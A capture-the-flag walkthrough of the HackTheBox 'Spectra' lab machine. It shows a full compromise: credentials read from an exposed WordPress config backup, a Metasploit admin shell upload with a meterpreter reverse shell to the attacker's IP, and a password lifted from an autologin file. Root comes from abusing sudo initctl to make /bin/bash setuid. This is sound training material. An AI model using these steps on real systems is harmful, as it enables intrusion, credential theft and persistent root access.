Spectra HackTheBox WalkThrough
This is the Spectra HackTheBox machine walkthrough. In this writeup I have demonstrated step by step how I rooted the Spectra HTB machine. Before starting, a few details about the box: it is a Linux machine (which I confirmed after rooting it) with IP address 10.10.10.229, and its maker rated the difficulty as easy.
Also, connect your PC to the HackTheBox VPN and confirm connectivity to the Spectra machine by pinging its IP 10.10.10.229. If everything works, start hacking. As usual, I began by scanning the machine. I used Nmap (port scanner) for this task and the result is below:-
Scanning
$ sudo nmap -sT -sV -p- -O -oA nmap/all-tcp-ports 10.10.10.229
The full TCP scan with Nmap found ports 22, 80 and 3306 open: an OpenSSH server on port 22, an Nginx web server on port 80 and a MySQL database server on port 3306. OpenSSH 8.1 is not affected by any serious vulnerability, so I left it for later, when I would have some credentials to try against it. Since a web server is running on port 80 there should be a website hosted on it, reachable at http://10.10.10.229.
That URL served a simple HTML web page with two links, Software Issue Tracker and Test. Both links point at the virtual host spectra.htb, so before following them let us add spectra.htb to our hosts file, which lives at /etc/hosts.
Host File After Modification
$ cat /etc/hosts
At http://spectra.htb/main/ I found WordPress installed in the /main folder with its default theme. I pressed CTRL+U to check the page source and found the version string 5.4.2. A quick Google search showed that this version is not affected by any serious vulnerability that would help with further enumeration. At http://spectra.htb/testing/index.php there is a second WordPress install, which shows a database connection error instead of a home page. However, directory listing is enabled on that path, so all of its files can be browsed at http://spectra.htb/testing.
After some initial enumeration I found the file wp-config.php.save. It contains credentials. Because the .save extension is not handed to PHP, nginx serves the raw file; the browser treats the leading <?php as markup and hides most of the file when rendering it, so you only see the full content in the page source. Here is the URL:
view-source:http://spectra.htb/testing/wp-config.php.save
The credentials extracted from it are
DB_USER: devtest
DB_PASSWORD: devteam01
When I tried to log in at http://spectra.htb/main/wp-login.php with devtest : devteam01 it said the credentials were wrong. But administrator : devteam01 logged in successfully: the database password is reused for the WordPress administrator account. I think the database connection issue at http://spectra.htb/testing/ comes from that config too, since the DB user named in it does not match what the database expects. Anyway, let us get a user shell with these creds.
There are multiple ways to get a user shell once you have WordPress admin credentials:
1. Upload a shell through the Add Theme option.
2. Upload a shell through the Add Plugins option.
3. Put the shell into the active theme's 404.php file through the theme editor.
4. Edit header.php (or a pre-installed plugin's files) through the built-in editor.
5. Use the Metasploit module exploit/unix/webapp/wp_admin_shell_upload to upload a malicious plugin and get a shell.
I am going to use the 5th way, Metasploit. To get the user shell follow the given steps.
Getting User Shell
msf6 > search wp_admin
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS spectra.htb
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.57
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
meterpreter > sysinfo
meterpreter > getuid
We have a shell running as the nginx user. Let us upgrade it to a proper interactive Linux shell so that we can run more advanced commands through it.
Upgrading Shell
meterpreter > shell
~export PATH
~export TERM=xterm
~python3 -c 'import pty;pty.spawn("/bin/bash")'
After the upgrade I tried to read the user flag from /home/katie/, but got permission denied because the nginx user cannot read user.txt. We have to find credentials for user katie to move to her privilege level.
After some enumeration I found the file autologin.conf.orig in the /opt/ directory. It contains the path of a passwd file that holds the actual credential. The complete path is /etc/autologin/passwd.
$ cat /opt/autologin.conf.orig
$ cat /etc/autologin/passwd
The passwd file contains a password. When I tried it over SSH as katie it worked, so we have SSH credentials for user katie:
katie : SummerHereWeCome!!
Let us log in to katie's account and capture the user flag.
Login Into Katie’s Account
$ ssh katie@spectra.htb
~SummerHereWeCome!!
$ whoami && id
We have successfully logged in as katie. Let us capture the user flag.
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate privileges to root we first have to find a privilege escalation vector.
Finding PrivEsc Vector
$ sudo -l
The command revealed that user katie can run initctl as root. This is our potential PrivEsc vector. Exploiting this excess right given to katie got me a root shell easily, so the privilege escalation here is Sudo Right Exploitation.
Let us understand how it works. initctl is the control tool for Upstart, the init system on this box: it starts, stops and queries the jobs Upstart manages. Every job is defined by a configuration file in the /etc/init/ directory, and the commands inside a job's script stanza are executed by init, that is, as root. If we can change any of these job files, we can start that job with initctl and its script runs as root. Since sudo lets katie run initctl as root, any code we put in a job file runs as root and we get a root shell.
So to get a root shell I modified the job file test.conf inside /etc/init/, because that file is writable by katie. I replaced the content between script and end script with a command that makes bash setuid root:
script
chmod +s /bin/bash
end script
After saving the file, start the job with sudo as shown below and follow the steps. Do this quickly, because the modified file is soon restored to its previous content. Once the job has run, /bin/bash is setuid root; running it with -p keeps the effective UID instead of dropping it, which is what gives the root shell. If all goes correctly you will have upgraded your shell to a root shell.
Getting Root Shell
$ sudo -l
$ ls -la /etc/init | grep test
$ vi /etc/init/test.conf
$ cat /etc/init/test.conf
$ sudo /sbin/initctl start test
$ /bin/bash -p
# whoami && id
We are root now. Let us capture the root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted the Spectra HackTheBox machine. I learnt a lot from this challenge, and I hope you have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion related to the walkthrough feel free to write to us at [email protected].